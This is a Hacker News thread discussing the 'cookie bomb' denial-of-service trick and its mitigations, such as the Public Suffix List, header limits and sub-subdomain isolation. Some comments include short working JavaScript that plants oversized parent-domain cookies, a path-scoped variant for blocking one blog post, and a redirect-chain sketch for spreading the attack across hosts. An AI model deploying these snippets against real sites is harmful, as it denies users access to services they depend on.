Cookie Bomb or Let's Break the Internet (homakov.blogspot.com)
362 points by paulmillr on Jan 18, 2014 | 75 comments



The DoS won't work on most of the specific example services mentioned in the post (Blogspot, GitHub, etc.), at least not if the user is using a modern browser, because most of the big names have such cookies blacklisted by browsers.

The mechanism is the Public Suffix List, which was originally created to keep track of which TLDs use public second-level domains and only allow registrations at the third level. For example, while foo.example.com and bar.example.com are both owned by example.com, foo.co.uk and bar.co.uk are two different domains, since co.uk is part of the UK domain hierarchy (along with ac.uk and so on) and registrations happen at the third level. It would therefore be undesirable if foo.co.uk could set cookies for the entire .co.uk, as in the UK ccTLD world that's equivalent to setting a cookie for all of .com.

So there's a big list (initiated by Mozilla) specifying that .com is a public suffix, .co.uk is a public suffix, etc., and wildcard cookies on public suffixes are refused. This has since been extended, as a huge hack, to big sites that have user-registerable subdomains. So now .blogspot.com is also treated as a public suffix, since anyone can "register" a foo.blogspot.com under it.

However, new entries are added on a fairly ad-hoc basis, so a site that allows user subdomains that can run JS is vulnerable by default unless it explicitly gets itself added. I notice Dropbox isn't there, for one.

The list: http://publicsuffix.org/
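
Roughly, the check a browser does before accepting a domain cookie looks something like this minimal sketch (the list contents and the function name are illustrative, not the actual Firefox/Chromium internals):

    // Hedged sketch: consult the PSL before honouring a Domain= attribute.
    // "publicSuffixes" stands in for the real list at publicsuffix.org.
    var publicSuffixes = ["com", "co.uk", "blogspot.com"];

    function isCookieDomainAllowed(requestHost, cookieDomain) {
      cookieDomain = cookieDomain.replace(/^\./, "");
      // Never accept a cookie scoped to a public suffix.
      if (publicSuffixes.indexOf(cookieDomain) !== -1) return false;
      // Otherwise the cookie domain must be the host itself or a parent of it.
      return requestHost === cookieDomain ||
             requestHost.slice(-(cookieDomain.length + 1)) === "." + cookieDomain;
    }

    isCookieDomainAllowed("evil.blogspot.com", ".blogspot.com"); // false
    isCookieDomainAllowed("store.example.com", ".example.com");  // true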


Works in Chrome. The actual "bombing" works in FF too, but it doesn't affect the top-level domain.

That's a semi-solution. How is it going to help when mysite.cdn.com/file1 bombs mysite.cdn.com/other-files...

Also look at translate.googleusercontent.com: if you bomb it, Google Translate will stop working.

I think the public suffix list is a great and useful idea, but it should be solved by browsers too, and cookie length should be limited.
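
For reference, the "bombing" itself is nothing more than a handful of oversized cookies set from JS on a subdomain; a minimal sketch, with the domain, count and sizes purely illustrative:

    // Hedged sketch: a few ~4 KB cookies scoped to the parent domain are
    // enough to push the Cookie header past typical request-header limits.
    var junk = new Array(4000).join("x"); // ~4 KB of filler
    for (var i = 0; i < 10; i++) {
      document.cookie = "bomb" + i + "=" + junk +
        "; domain=.example.com; path=/; expires=Fri, 01 Jan 2100 00:00:00 GMT";
    }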


> Works in Chrome.

Hmm, looks like Chrome isn't respecting the Public Suffix List for setting cookies ATM, even though the site for the list claims that it does.[0]

As an example, view [1] and [2] in Chrome, and note that cookies set by [1] are visible to [2], even though this shouldn't be allowed given blogspot's entry in the Public Suffix List. Firefox doesn't exhibit this behaviour, and I'm thinking this is a recent regression in Chrome, but who knows.

> Also look at translate.googleusercontent.com: if you bomb it, Google Translate will stop working.

I haven't taken a look at it, but would it make sense to add dynamic <original>.translate.googleusercontent.com subdomains for translated sites and add the base domain to the public suffix list?

> it should be solved by browsers too, and cookie length should be limited

IMO this is only going to be solved by a revision to the spec that resolves the ambiguity. The core issue is that browsers and servers disagree as to what a "reasonable" cookie jar size is, and servers are rejecting requests with "unreasonably" large cookie jars.

Until those limits are actually part of a spec that people follow, someone's going to be sending too much or allowing too little and legitimate requests will get rejected.

I don't know if you've read Michal's "The Tangled Web" or the Browser Security Handbook but they both go into it a little.[3]

[0]: http://publicsuffix.org/learn/ (under Chromium)

[1]: http://cookietestblog1.blogspot.com/2014/01/cookie-test.html

[2]: http://cookietestblog2.blogspot.com/2014/01/cookie-test.html

[3]: http://code.google.com/p/browsersec/wiki/Part2#Same-origin_p... (under cookie jar size)
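
(For what it's worth, the kind of test involved boils down to something like the sketch below; this is a guess at the idea, not the actual contents of [1] and [2].)

    // Page [1]: try to set a cookie scoped to the whole public suffix.
    document.cookie = "psl_test=1; domain=.blogspot.com; path=/";

    // Page [2]: check whether it arrived. With the PSL honoured, the
    // line above should have been silently ignored.
    document.write(document.cookie.indexOf("psl_test=1") !== -1
      ? "cookie visible (PSL ignored)"
      : "cookie not visible (PSL respected)");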


>I haven't taken a look at it, but would it make sense to add dynamic <original>.translate.googleusercontent.com subdomains for translated sites and add the base domain to the public suffix list?

A random hash, as in sandbox.<hash>.guc.com, will work.


The public suffix list has two purposes: browsers won't accept wildcard cookies against a listed name (desirable) but also won't accept a wildcard certificate against it (undesirable). It's true that nobody should have a certificate for *.com or *.co.uk, but it is reasonable for Google to have *.blogspot.com.

To remove the cross-site exposure in shared domains using the PSL, there'd need to be an extra bit expressed with every entry in the PSL. Alternately, browsers could re-try the request without any cookies.


Oh, I had no idea they started adding domains like blogspot.com--that's clever! They must have just started doing that recently. And not quite as much of a hack as you say, really, since the justification is the same as the other suffixes.


The justification is the same, but it seems much less feasible to be "complete". There are a pretty manageable number of TLDs, and they generally have published policies about what they'll publicly register, so you can plausibly collect a complete list of which suffixes are public ones. But covering stuff like blogspot.com has to be done on a case-by-case basis and will be wildly incomplete. It mitigates the problem by including some of the higher-profile sites, but it doesn't seem like it can solve it generally.


Couldn't a solution be something stored in DNS that tells browsers not to let subdomains' JS do this?

So if I own example.com I could set something in my DNS that would prevent subdomain.example.com from setting cookies on example.com.


Wouldn't a relatively simple fix for this be to detect this at the front end, and serve a static page with JavaScript that clears all of their cookies and then redirects back?
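
Something along these lines, presumably (a sketch; it can only expire cookies the page can see, and has to guess at domain/path combinations):

    // Hedged sketch of such a recovery page: expire every cookie the page
    // can see for the obvious domain/path combinations, then bounce back.
    document.cookie.split(";").forEach(function (c) {
      var name = c.split("=")[0].trim();
      var base = location.hostname.split(".").slice(-2).join("."); // crude guess
      ["/", location.pathname].forEach(function (path) {
        document.cookie = name + "=; path=" + path +
          "; expires=Thu, 01 Jan 1970 00:00:00 GMT";
        document.cookie = name + "=; path=" + path + "; domain=." + base +
          "; expires=Thu, 01 Jan 1970 00:00:00 GMT";
      });
    });
    location.replace(document.referrer || "/");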


If I understand this correctly, that would be after the client has sent umpteen MB or GB of cookie data to you, and you've hopefully detected what's going on and are just routing the request to /dev/null by this time. If, after that, the sending of the request hasn't caused a timeout, sure, we can send some JS to delete cookies.


nice! HN should use this list for the domain display.


Combined with a simple XSS (or any other problem; modern websites are full of such bugs), this DoS will work.


This is something Zalewski has written about: http://lcamtuf.blogspot.com/2010/10/http-cookies-or-how-not-... --- if this kind of thing is interesting to you, his latest book, _The Tangled Web_, is excellent.


That page, and the linked browsersec pages on Google Code, are terrifying. Time to burn it all down and start from scratch.

I was particularly stunned to learn HTTP Cookie headers can clobber 'secure' cookies set over HTTPS. Eye-popping.


And to increase your terror, check out http://lcamtuf.coredump.cx/postxss/


Another vote for The Tangled Web. It's a great read.


I read that post before; maybe I missed it, but where does he talk about the DoS possibilities of cookie tossing?


Search for "Does this matter from a security perspective".

Also: take a crack at the CTF we set up. I think (a) you'll do well at it and (b) it'll be fun to watch you. http://microcorruption.com.


Yes, now I see. Weird that it stayed unfixed; the Public Suffix List is not implemented in Chrome.

Anyway, the list is not even close to a real solution (I just had a long discussion with @titanius on Twitter about why not). There are so many quirks and use cases of <sub>.domain.

> it'll be fun to watch you

uh. hmm, ok.


No pressure there.


You too! You helped us plan the damn thing!


The attack was also discussed in detail here: http://mixedbit.org/blog/2013/04/11/dos_attack_on_cdn_users....


The impact on CDN providers is kinda scary.

To take an example we all know and love, a malicious *.cloudfront.net distribution could set cookies against cloudfront.net, breaking all your fancy static asset serving from CloudFront.

Is there a mitigation other than _always_ having to use a myappname-static.com domain name?

Thinking about this at a higher level -- there are some interesting similarities to "shared hosting" resource contention, but this time with domain names on CDNs. If somebody executes a forkbomb on your shared host, you're hosed. If somebody executes a cookiebomb on your CDN provider SLD, you're hosed.

Browser vendors could prevent this with good second-level domain support. Register cloudfront, akamai, etc. domain names as only hosting user-created content on third-level domains. Pin large examples to the browser distribution, and allow TXT records in DNS specifying this at the top level.


Web browsers could also mitigate against it by limiting the size of their requests. If too many cookies have been set, throw away the older ones until the request is small enough to likely be accepted by most web servers.

It's not a perfect fix, nor does it solve the wider issue of letting one domain set a cookie for a domain that it has no authority over, but it would stop people being blocked from a site with a bizarre 500 error. Worst case, a login/ID cookie gets flushed and the user has to log in again.


Interesting. Just this week I had to investigate the exact same issue at my job. One user (of course it was the CEO...) had accumulated so many cookies that on some pages of our website he ran into the HTTP request header limit and would only get a 500 error page.

One risk factor is using JavaScript based third party services that use cookies with your host name. In our case, it was Optimizely that was storing pretty significant amounts of data in cookies. Not really sure how to tackle this issue.


We had the same issue with Optimizely cookies. They serialize the experiment data as a json blob, which grows with more experiments, and store it in a cookie. What a pain to debug as it wasn't consistent for every user.


Bump up the limit in the web server config ;)
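
For nginx, for instance, the relevant knob is large_client_header_buffers (the values below are just an example, not a recommendation):

    # Example only: raise the per-header buffer so an oversized Cookie
    # header stops getting the request rejected (nginx default is 4 8k).
    http {
        large_client_header_buffers 4 32k;
    }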


Forgot to mention that we're using Akamai, and it's actually Akamai's servers that are hitting the limit. We'll see if we'll be able to convince them to bump up the limit. I have a hunch that there might be some resistance because of performance implications (I'm not an operations guy, my knowledge of how web servers work internally is limited). On the other hand, it seemed to intermittently work, so there may be some servers in their farm that are configured differently. Or it could have been due to fluctuations in the header length because of different query string lengths and cookie changes.


Pretty clever. This appears to be in the same vein as that trick where you could use popups to spawn more popups, and by the time the user realized what was going on their computer was completely unresponsive. (fixed with popup blocking in any browser in the last decade.)

Also, Fill my Disk: http://www.filldisk.com/ (local storage bomb)

Implementing limits on the number of cookies would seem to be the natural solution to the problem in the OP, although I doubt this problem is "worth" solving in practice since most people seem to be using cookies to do what they were meant to do.


> This appears to be in the same vein as that trick where you could use popups to spawn more popups, and by the time the user realized what was going on their computer was completely unresponsive. (fixed with popup blocking in any browser in the last decade.)

I recently visited a site that did something similar but was still effective. It opened up mailto: URIs in a loop, and since I had Thunderbird set up to handle the links, it practically killed my X session.


Interesting. Quick test result: it looks like flipping network.protocol-handler.external.mailto to false in the Firefox config prevents this (though of course it also prevents action on mailto links).

There's an open bug in regards to this issue: https://bugzilla.mozilla.org/show_bug.cgi?id=566893


It shouldn't be possible to launch mailto links without an interactive prompt; if it is, please file a bug on the browser.


Simple proof of concept: http://jsfiddle.net/rVxkv/

This opens 2 Thunderbird windows in Firefox 26 but only one in Chromium 31.0.1650.63.

edit: I totally agree it shouldn't be possible :)


I've never seen a prompt to open a mailto: link. Where is it specified there should be one?


I think by "interactive prompt" he means "user interaction".


I suppose I can see an argument for popping something up before firing the schema handler when something sets location.href to a mailto: URL, but that seems like the sort of thing where you'd really want to wait for evidence that it's a problem for anyone before you implement it; it both annoys the user and complicates your code, neither of which is desirable in the absence of real provocation.


Not the number, but the total length of the Cookie header; otherwise the allowed number of cookies would have to be ~5.

Yes, I recall filldisk.com, but that one doesn't seem harmful to the user (they know where it comes from, and the exploit is quite slow).

A cookie bomb can "bomb" an exact path, so the trick has many uses. E.g. you can "block" /dont_like_this_post on Blogspot entirely, while the rest of Blogger keeps working.
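
Same trick as the sketch further up, just scoped with path= so that only the targeted path is affected; a rough sketch:

    // Hedged sketch of the path-scoped variant: where the browser accepts
    // the domain= part, only requests for /dont_like_this_post carry the
    // oversized cookies, and the rest of the site keeps working.
    var junk = new Array(4000).join("x");
    for (var i = 0; i < 10; i++) {
      document.cookie = "bomb" + i + "=" + junk +
        "; domain=.blogspot.com; path=/dont_like_this_post" +
        "; expires=Fri, 01 Jan 2100 00:00:00 GMT";
    }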


The extra level of subdomain, as proposed by Homakov, seems like a much more worthwhile fix.


There's a similar self-denial of service you can run into when you're injecting javascript and cookies into third-party pages.

Optimizely (YC W10) had this problem when they were setting cookies on a single domain across all of their customer sites. If you happened to be the kind of user that visited websites that had a high chance of using Optimizely, you quickly accumulated enough cookies to make their fronting proxy reject your request for their JS.


Why isn't the obvious fix discussed: Change browsers to not let subdomains set cookies for parent domains.

Probably this feature is of critical use; if so, I'd be grateful if someone could explain it to me.


One common use is to pass session data between subsections of a site. For example, the user logs into www.example.com, and is still logged in when they head over to store.example.com.
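
Concretely, that works by the login endpoint setting a parent-domain cookie along these lines (the cookie name and value are made up):

    Set-Cookie: session=abc123; Domain=.example.com; Path=/; Secure; HttpOnly

Because the Domain attribute is .example.com, the browser also sends it to store.example.com.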


That could also be implemented under my proposed fix, by having example.com set the auth cookies. They would continue to be readable by store.example.com.

Sure, it would require a change on the server side, which is a pain. But I can't think of a practical scenario that would be impossible to implement with the proposed fix.


Your idea would likely break any site on the internet that uses authentication and subdomains. Isn't it clear why this isn't being considered?


Or sites could opt-in to this with a header?

EDIT: homakov says the same thing down thread.


Yes, it is backwards incompatible. Perhaps it could be enforced in HTTP 2?


How do you set a cookie on a domain you do not control? Won't the browser only send cookies to a server on the domain you are trying to browse to?

EDIT: found it - not just any arbitrary site can be DoSed:

"Who can be cookie-bombed? Blogging/hosting/website/homepage platforms: Wordpress, Blogspot, Tumblr, Heroku, etc."


- "If you're able to execute your own JS on SUB1.example.com it can cookie-bomb not only your SUB1 but the entire *.example.com network, including example.com"

So you've got to be able to execute JS in a subdomain to plant a cookie bomb that will affect the entire domain.


This is for domains that serve user-provided JavaScript, such as blog hosts and GitHub.


Who can be cookie-bombed? Blogging/hosting/website/homepage platforms: Wordpress, Blogspot, Tumblr, Heroku, etc.

WordPress.com would not be vulnerable since users cannot upload or execute arbitrary JavaScript.


I didn't like the web protocols

Now I like them even less.


[deleted]


No, not like this. You can block some path, but you can't set domain=dontlike.host.com; only the entire *.host.com network.


No, foo.example.com cannot set a cookie for bar.example.com. It can only set cookies for itself and example.com.


Terry Davis scares me.


It's really interesting. The problem is that I don't see any fix for it. The only way would be to update the browsers, or maybe use a plugin to block such attacks.


Or serve the untrusted content from a sub-subdomain, e.g. "foo.bar.CDN_HOST.com", so that you could only bomb bar.CDN_HOST.com and not the entire domain.


You'd think a higher level domain should be able to specify whether a subdomain can set cookies for it or not.


That would be nice, but it would have a lot of ramifications. Before setting the cookie, the browser would need to know whether it's allowed, so presumably it would have to load some file. Perhaps this could be done in a manner similar to CORS preflight requests.


Content-Security-Policy: can-set-cookies: no!

BTW if JS is off we can use <meta http-equiv Set-Cookie>
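
i.e. something along these lines (a sketch; support for the Set-Cookie meta tag varies by browser):

    <!-- Hedged sketch of the meta-tag fallback mentioned above -->
    <meta http-equiv="Set-Cookie"
          content="bomb0=xxxxxxxx; domain=.example.com; path=/">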


It might be better to allow:

Content-Security-Policy: can-set-cookies-for-parent-domain: no!

There's no harm in letting haxx0r.blogspot.com set cookies for haxx0r.blogspot.com. It's only cookies for blogspot.com that should be restricted.


Well OK then.


Seems like the way to do this would be to create accounts on all the services you want to bomb and set up JavaScript redirects, so that hitting one host sets the cookies and redirects to the next. Have it be a loop so that entering the chain at any point works. By definition, once you hit the first host in the chain again, your request will be denied.

The question is how to get people to visit a site that loads one of those URLs...
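
A sketch of one hop in such a chain (the hosts and the helper are placeholders, not real services):

    // Plant the bomb for this host (as in the sketches above), then hand
    // off to the next host in the loop. plantCookieBomb is hypothetical.
    plantCookieBomb(".host-a.example");
    location.href = "http://attacker.host-b.example/next.html";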


Possible detection method (server side)? If the request is too long due to cookie length, then look at the last URL the client IP hit. That should be the URL creating the long cookies. Remove the offending URL / resource.


That won't work, and could be easily abused by crafting your own requests to blame any arbitrary URL of your choosing.

Plus, servers drop huge requests because they are most likely malformed or DOS attempts. Attempting to do extra work (like tracking down previous visits by the client) will only make matters worse for the server.


Hmmm. Yes, I see the potential for abuse. Why do you say it would not work, though?


This was happening on my Gmail account a few weeks ago. It was a little disconcerting. I never figured out what was wrong but it seemed to fix itself after I deleted cookies a few times.


Is this the reason I can't access any *.github.io right now?

Is there an equivalent to status.github.com for github.io?


Have... you tried clearing your cookies? :-)


! I should actually read the content of articles. That's enough internet for today.


> Is there an equivalent to status.github.com for github.io?

If you want to check the status of your own GH Pages hosted site, you can go to your repository for the page, then go to "Settings > Health" and you can see a basic status for Server Status, Usage, and Repository Integrity.


I don't see that. Did you just out a staff-only feature? ;)


github.io works for me right now.


Surely if you were able to do this, you would use it for cookie tossing rather than this simple mischief?


Cookie tossing is not always helpful. If the session is properly tied to a CSRF token, there's not much you can do with it.


homakov, you have a fun job.


pointsIterator++;

Works on Iceweasel 17.0.10.



